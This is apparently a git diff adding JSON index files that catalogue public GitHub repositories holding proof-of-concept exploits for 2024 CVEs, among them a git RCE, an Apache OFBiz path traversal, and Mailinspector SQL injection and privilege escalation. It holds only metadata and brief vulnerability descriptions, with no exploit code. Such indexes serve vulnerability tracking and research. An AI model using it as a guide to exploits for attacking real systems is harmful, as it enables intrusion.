+ "description": "Repo for testing CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-22T18:43:36Z",
+ "updated_at": "2024-05-22T21:16:26Z",
+ "pushed_at": "2024-05-22T21:16:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804525927,
+ "name": "CVE-2024-32002-hook",
+ "full_name": "vincepsh\/CVE-2024-32002-hook",
+ "owner": {
+ "login": "vincepsh",
+ "id": 60623403,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60623403?v=4",
+ "html_url": "https:\/\/github.com\/vincepsh"
+ },
+ "html_url": "https:\/\/github.com\/vincepsh\/CVE-2024-32002-hook",
+ "description": "CVE-2024-32002-hook",
+ "fork": false,
+ "created_at": "2024-05-22T18:50:56Z",
+ "updated_at": "2024-05-22T18:57:39Z",
+ "pushed_at": "2024-05-22T18:57:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804686415,
+ "name": "CVE-2024-32002-EXP",
+ "full_name": "10cks\/CVE-2024-32002-EXP",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32002-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-23T04:25:51Z",
+ "updated_at": "2024-05-23T05:05:20Z",
+ "pushed_at": "2024-05-23T04:26:52Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804727102,
+ "name": "CVE-2024-32002",
+ "full_name": "WOOOOONG\/CVE-2024-32002",
+ "owner": {
+ "login": "WOOOOONG",
+ "id": 40143329,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4",
+ "html_url": "https:\/\/github.com\/WOOOOONG"
+ },
+ "html_url": "https:\/\/github.com\/WOOOOONG\/CVE-2024-32002",
+ "description": "PoC Exploit for CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-23T06:38:34Z",
+ "updated_at": "2024-05-23T06:55:05Z",
+ "pushed_at": "2024-05-23T06:55:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804727245,
+ "name": "hook",
+ "full_name": "WOOOOONG\/hook",
+ "owner": {
+ "login": "WOOOOONG",
+ "id": 40143329,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40143329?v=4",
+ "html_url": "https:\/\/github.com\/WOOOOONG"
+ },
+ "html_url": "https:\/\/github.com\/WOOOOONG\/hook",
+ "description": "PoC Exploit for CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-23T06:38:56Z",
+ "updated_at": "2024-05-23T06:54:49Z",
+ "pushed_at": "2024-05-23T06:54:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 804756776,
+ "name": "poc-cve-2024-32002",
+ "full_name": "fadhilthomas\/poc-cve-2024-32002",
+ "owner": {
+ "login": "fadhilthomas",
+ "id": 29804796,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29804796?v=4",
+ "html_url": "https:\/\/github.com\/fadhilthomas"
+ },
+ "html_url": "https:\/\/github.com\/fadhilthomas\/poc-cve-2024-32002",
+ "description": "poc of git rce using cve-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-23T07:56:05Z",
+ "updated_at": "2024-05-26T19:44:08Z",
+ "pushed_at": "2024-05-24T10:39:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-32002",
+ "git",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 805294860,
+ "name": "hook",
+ "full_name": "fadhilthomas\/hook",
+ "owner": {
+ "login": "fadhilthomas",
+ "id": 29804796,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29804796?v=4",
+ "html_url": "https:\/\/github.com\/fadhilthomas"
+ },
+ "html_url": "https:\/\/github.com\/fadhilthomas\/hook",
+ "description": "part of poc cve-2024-32002",
+ "fork": false,
+ "created_at": "2024-05-24T09:23:42Z",
+ "updated_at": "2024-05-24T11:10:46Z",
+ "pushed_at": "2024-05-24T10:05:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2024-32002",
+ "git",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 805740767,
+ "name": "cve-2024-32002-submodule-aw",
+ "full_name": "JakobTheDev\/cve-2024-32002-submodule-aw",
+ "owner": {
+ "login": "JakobTheDev",
+ "id": 21337744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4",
+ "html_url": "https:\/\/github.com\/JakobTheDev"
+ },
+ "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-submodule-aw",
+ "description": "A submodule to demonstrate CVE-2024-32002. Demonstrates arbitrary write into .git.",
+ "fork": false,
+ "created_at": "2024-05-25T10:29:13Z",
+ "updated_at": "2024-05-25T12:20:27Z",
+ "pushed_at": "2024-05-25T12:08:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 805741257,
+ "name": "cve-2024-32002-poc-aw",
+ "full_name": "JakobTheDev\/cve-2024-32002-poc-aw",
+ "owner": {
+ "login": "JakobTheDev",
+ "id": 21337744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21337744?v=4",
+ "html_url": "https:\/\/github.com\/JakobTheDev"
+ },
+ "html_url": "https:\/\/github.com\/JakobTheDev\/cve-2024-32002-poc-aw",
+ "description": "A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.",
+ "fork": false,
+ "created_at": "2024-05-25T10:30:57Z",
+ "updated_at": "2024-05-25T12:20:17Z",
+ "pushed_at": "2024-05-25T12:14:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 806888145,
+ "name": "CVE-2024-32002-git-rce",
+ "full_name": "Goplush\/CVE-2024-32002-git-rce",
+ "owner": {
+ "login": "Goplush",
+ "id": 81841745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81841745?v=4",
+ "html_url": "https:\/\/github.com\/Goplush"
+ },
+ "html_url": "https:\/\/github.com\/Goplush\/CVE-2024-32002-git-rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-28T05:27:23Z",
+ "updated_at": "2024-06-01T06:27:38Z",
+ "pushed_at": "2024-05-28T07:41:35Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 807969410,
+ "name": "rcetest",
+ "full_name": "431m\/rcetest",
+ "owner": {
+ "login": "431m",
+ "id": 71336091,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71336091?v=4",
+ "html_url": "https:\/\/github.com\/431m"
+ },
+ "html_url": "https:\/\/github.com\/431m\/rcetest",
+ "description": "CVE-2024-32002 poc test",
+ "fork": false,
+ "created_at": "2024-05-30T06:08:33Z",
+ "updated_at": "2024-06-03T04:13:19Z",
+ "pushed_at": "2024-05-30T06:17:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808410272,
+ "name": "CVE-2024-32002",
+ "full_name": "AD-Appledog\/CVE-2024-32002",
+ "owner": {
+ "login": "AD-Appledog",
+ "id": 94734520,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94734520?v=4",
+ "html_url": "https:\/\/github.com\/AD-Appledog"
+ },
+ "html_url": "https:\/\/github.com\/AD-Appledog\/CVE-2024-32002",
+ "description": "CVE-2024-32002wakuwaku",
+ "fork": false,
+ "created_at": "2024-05-31T02:40:31Z",
+ "updated_at": "2024-05-31T02:54:23Z",
+ "pushed_at": "2024-05-31T02:54:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 808411710,
+ "name": "wakuwaku",
+ "full_name": "AD-Appledog\/wakuwaku",
+ "owner": {
+ "login": "AD-Appledog",
+ "id": 94734520,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94734520?v=4",
+ "html_url": "https:\/\/github.com\/AD-Appledog"
+ },
+ "html_url": "https:\/\/github.com\/AD-Appledog\/wakuwaku",
+ "description": "cve-2024-32002yahhh",
+ "fork": false,
+ "created_at": "2024-05-31T02:45:44Z",
+ "updated_at": "2024-05-31T02:50:33Z",
+ "pushed_at": "2024-05-31T02:50:30Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809009313,
+ "name": "cve_2024_32002",
+ "full_name": "tobelight\/cve_2024_32002",
+ "owner": {
+ "login": "tobelight",
+ "id": 131186949,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131186949?v=4",
+ "html_url": "https:\/\/github.com\/tobelight"
+ },
+ "html_url": "https:\/\/github.com\/tobelight\/cve_2024_32002",
+ "description": "https:\/\/www.cve.org\/CVERecord?id=CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-06-01T12:27:50Z",
+ "updated_at": "2024-06-01T12:30:39Z",
+ "pushed_at": "2024-06-01T12:30:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 809142955,
+ "name": "CVE-2024-32002-PoC_Chinese",
+ "full_name": "Basyaact\/CVE-2024-32002-PoC_Chinese",
+ "owner": {
+ "login": "Basyaact",
+ "id": 49944732,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49944732?v=4",
+ "html_url": "https:\/\/github.com\/Basyaact"
+ },
+ "html_url": "https:\/\/github.com\/Basyaact\/CVE-2024-32002-PoC_Chinese",
+ "description": "none",
+ "fork": false,
+ "created_at": "2024-06-01T20:19:05Z",
+ "updated_at": "2024-06-05T20:10:48Z",
+ "pushed_at": "2024-06-05T20:10:45Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817662725,
+ "name": "CVE-2024-32002",
+ "full_name": "bonnettheo\/CVE-2024-32002",
+ "owner": {
+ "login": "bonnettheo",
+ "id": 33837840,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33837840?v=4",
+ "html_url": "https:\/\/github.com\/bonnettheo"
+ },
+ "html_url": "https:\/\/github.com\/bonnettheo\/CVE-2024-32002",
+ "description": "exploit for CVE-2024-32002",
+ "fork": false,
+ "created_at": "2024-06-20T07:37:09Z",
+ "updated_at": "2024-06-25T13:56:03Z",
+ "pushed_at": "2024-06-25T13:55:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32004.json b/2024/CVE-2024-32004.json
new file mode 100644
index 0000000000..d7f3b4cab7
--- /dev/null
+++ b/2024/CVE-2024-32004.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 802872644,
+ "name": "CVE-2024-32004",
+ "full_name": "Wadewfsssss\/CVE-2024-32004",
+ "owner": {
+ "login": "Wadewfsssss",
+ "id": 48876891,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48876891?v=4",
+ "html_url": "https:\/\/github.com\/Wadewfsssss"
+ },
+ "html_url": "https:\/\/github.com\/Wadewfsssss\/CVE-2024-32004",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-19T13:57:46Z",
+ "updated_at": "2024-05-20T06:16:40Z",
+ "pushed_at": "2024-05-20T06:16:37Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803351666,
+ "name": "CVE-2024-32004-POC",
+ "full_name": "10cks\/CVE-2024-32004-POC",
+ "owner": {
+ "login": "10cks",
+ "id": 47177550,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47177550?v=4",
+ "html_url": "https:\/\/github.com\/10cks"
+ },
+ "html_url": "https:\/\/github.com\/10cks\/CVE-2024-32004-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-20T14:59:16Z",
+ "updated_at": "2024-05-20T15:02:51Z",
+ "pushed_at": "2024-05-20T15:02:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32030.json b/2024/CVE-2024-32030.json
new file mode 100644
index 0000000000..087cc855cd
--- /dev/null
+++ b/2024/CVE-2024-32030.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819385498,
+ "name": "CVE-2024-32030-Nuclei-Template",
+ "full_name": "huseyinstif\/CVE-2024-32030-Nuclei-Template",
+ "owner": {
+ "login": "huseyinstif",
+ "id": 54823077,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54823077?v=4",
+ "html_url": "https:\/\/github.com\/huseyinstif"
+ },
+ "html_url": "https:\/\/github.com\/huseyinstif\/CVE-2024-32030-Nuclei-Template",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-24T11:57:26Z",
+ "updated_at": "2024-06-24T11:57:31Z",
+ "pushed_at": "2024-06-24T11:57:29Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32113.json b/2024/CVE-2024-32113.json
new file mode 100644
index 0000000000..e0f1942807
--- /dev/null
+++ b/2024/CVE-2024-32113.json
@@ -0,0 +1,42 @@
+[
+ {
+ "id": 809872637,
+ "name": "CVE-2024-32113",
+ "full_name": "Mr-xn\/CVE-2024-32113",
+ "owner": {
+ "login": "Mr-xn",
+ "id": 18260135,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4",
+ "html_url": "https:\/\/github.com\/Mr-xn"
+ },
+ "html_url": "https:\/\/github.com\/Mr-xn\/CVE-2024-32113",
+ "description": "Apache OFBIZ Path traversal leading to RCE POC[CVE-2024-32113 & CVE-2024-36104]",
+ "fork": false,
+ "created_at": "2024-06-03T15:57:59Z",
+ "updated_at": "2024-06-17T11:16:50Z",
+ "pushed_at": "2024-06-03T16:13:49Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "apache",
+ "cve",
+ "cve-2024",
+ "cve-2024-32113",
+ "cve-2024-36104",
+ "ofbiz",
+ "poc",
+ "rce",
+ "rce-exploit"
+ ],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32136.json b/2024/CVE-2024-32136.json
new file mode 100644
index 0000000000..4ef63f9cf4
--- /dev/null
+++ b/2024/CVE-2024-32136.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796233073,
+ "name": "CVE-2024-32136",
+ "full_name": "xbz0n\/CVE-2024-32136",
+ "owner": {
+ "login": "xbz0n",
+ "id": 40547674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40547674?v=4",
+ "html_url": "https:\/\/github.com\/xbz0n"
+ },
+ "html_url": "https:\/\/github.com\/xbz0n\/CVE-2024-32136",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-05T10:49:08Z",
+ "updated_at": "2024-05-20T09:23:10Z",
+ "pushed_at": "2024-05-05T11:00:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-3217.json b/2024/CVE-2024-3217.json
new file mode 100644
index 0000000000..bd84bf0cd7
--- /dev/null
+++ b/2024/CVE-2024-3217.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 787948963,
+ "name": "CVE-2024-3217-POC",
+ "full_name": "BassamAssiri\/CVE-2024-3217-POC",
+ "owner": {
+ "login": "BassamAssiri",
+ "id": 59013588,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59013588?v=4",
+ "html_url": "https:\/\/github.com\/BassamAssiri"
+ },
+ "html_url": "https:\/\/github.com\/BassamAssiri\/CVE-2024-3217-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-17T13:43:57Z",
+ "updated_at": "2024-05-08T22:44:10Z",
+ "pushed_at": "2024-04-17T14:15:05Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32205.json b/2024/CVE-2024-32205.json
new file mode 100644
index 0000000000..244aa80e20
--- /dev/null
+++ b/2024/CVE-2024-32205.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 789261382,
+ "name": "CVE-2024-32205",
+ "full_name": "Lucky-lm\/CVE-2024-32205",
+ "owner": {
+ "login": "Lucky-lm",
+ "id": 104305063,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104305063?v=4",
+ "html_url": "https:\/\/github.com\/Lucky-lm"
+ },
+ "html_url": "https:\/\/github.com\/Lucky-lm\/CVE-2024-32205",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-20T04:11:19Z",
+ "updated_at": "2024-04-20T04:11:19Z",
+ "pushed_at": "2024-04-20T04:11:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32238.json b/2024/CVE-2024-32238.json
new file mode 100644
index 0000000000..574d756fe5
--- /dev/null
+++ b/2024/CVE-2024-32238.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 789258062,
+ "name": "CVE-2024-32238",
+ "full_name": "asdfjkl11\/CVE-2024-32238",
+ "owner": {
+ "login": "asdfjkl11",
+ "id": 96732416,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96732416?v=4",
+ "html_url": "https:\/\/github.com\/asdfjkl11"
+ },
+ "html_url": "https:\/\/github.com\/asdfjkl11\/CVE-2024-32238",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-20T03:55:21Z",
+ "updated_at": "2024-04-20T03:55:22Z",
+ "pushed_at": "2024-04-20T03:55:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 789466929,
+ "name": "CVE-2024-32238",
+ "full_name": "FuBoLuSec\/CVE-2024-32238",
+ "owner": {
+ "login": "FuBoLuSec",
+ "id": 156916644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156916644?v=4",
+ "html_url": "https:\/\/github.com\/FuBoLuSec"
+ },
+ "html_url": "https:\/\/github.com\/FuBoLuSec\/CVE-2024-32238",
+ "description": "H3C ER8300G2-X config download",
+ "fork": false,
+ "created_at": "2024-04-20T16:23:10Z",
+ "updated_at": "2024-04-20T16:28:56Z",
+ "pushed_at": "2024-04-20T16:28:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32258.json b/2024/CVE-2024-32258.json
new file mode 100644
index 0000000000..01e43ec7de
--- /dev/null
+++ b/2024/CVE-2024-32258.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 788568781,
+ "name": "CVE-2024-32258",
+ "full_name": "liyansong2018\/CVE-2024-32258",
+ "owner": {
+ "login": "liyansong2018",
+ "id": 25031216,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25031216?v=4",
+ "html_url": "https:\/\/github.com\/liyansong2018"
+ },
+ "html_url": "https:\/\/github.com\/liyansong2018\/CVE-2024-32258",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-18T17:07:07Z",
+ "updated_at": "2024-04-22T06:22:48Z",
+ "pushed_at": "2024-04-22T06:22:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32369.json b/2024/CVE-2024-32369.json
new file mode 100644
index 0000000000..264839f7ad
--- /dev/null
+++ b/2024/CVE-2024-32369.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796814769,
+ "name": "CVE-2024-32369",
+ "full_name": "chucrutis\/CVE-2024-32369",
+ "owner": {
+ "login": "chucrutis",
+ "id": 17951072,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4",
+ "html_url": "https:\/\/github.com\/chucrutis"
+ },
+ "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32369",
+ "description": "Description: SQL Injection vulnerability in HSC Cybersecurity HSC Mailinspector v.5.2.17-3 allows a remote attacker to obtain sensitive information via a crafted payload to the start and limit parameter in the mliWhiteList.php component.",
+ "fork": false,
+ "created_at": "2024-05-06T17:22:15Z",
+ "updated_at": "2024-06-06T17:25:35Z",
+ "pushed_at": "2024-05-06T17:22:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32370.json b/2024/CVE-2024-32370.json
new file mode 100644
index 0000000000..14688b347b
--- /dev/null
+++ b/2024/CVE-2024-32370.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796817594,
+ "name": "CVE-2024-32370",
+ "full_name": "chucrutis\/CVE-2024-32370",
+ "owner": {
+ "login": "chucrutis",
+ "id": 17951072,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4",
+ "html_url": "https:\/\/github.com\/chucrutis"
+ },
+ "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32370",
+ "description": "An issue in HSC Cybersecurity HSC Mailinspector version 5.2.17-3 has been identified, allowing a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component.",
+ "fork": false,
+ "created_at": "2024-05-06T17:28:57Z",
+ "updated_at": "2024-06-06T17:23:55Z",
+ "pushed_at": "2024-05-06T18:50:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-32371.json b/2024/CVE-2024-32371.json
new file mode 100644
index 0000000000..f846bf08e4
--- /dev/null
+++ b/2024/CVE-2024-32371.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 796823130,
+ "name": "CVE-2024-32371",
+ "full_name": "chucrutis\/CVE-2024-32371",
+ "owner": {
+ "login": "chucrutis",
+ "id": 17951072,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17951072?v=4",
+ "html_url": "https:\/\/github.com\/chucrutis"
+ },
+ "html_url": "https:\/\/github.com\/chucrutis\/CVE-2024-32371",
+ "description": "A vulnerability identified as CVE-2024-32371 allows an attacker to elevate privileges by changing the type parameter from 1 to 0. This vulnerability enables an attacker with a regular user account to escalate their privileges and gain administrative access to the system.",
+ "fork": false,
+ "created_at": "2024-05-06T17:41:06Z",
+ "updated_at": "2024-06-06T17:25:16Z",
+ "pushed_at": "2024-05-06T18:21:24Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
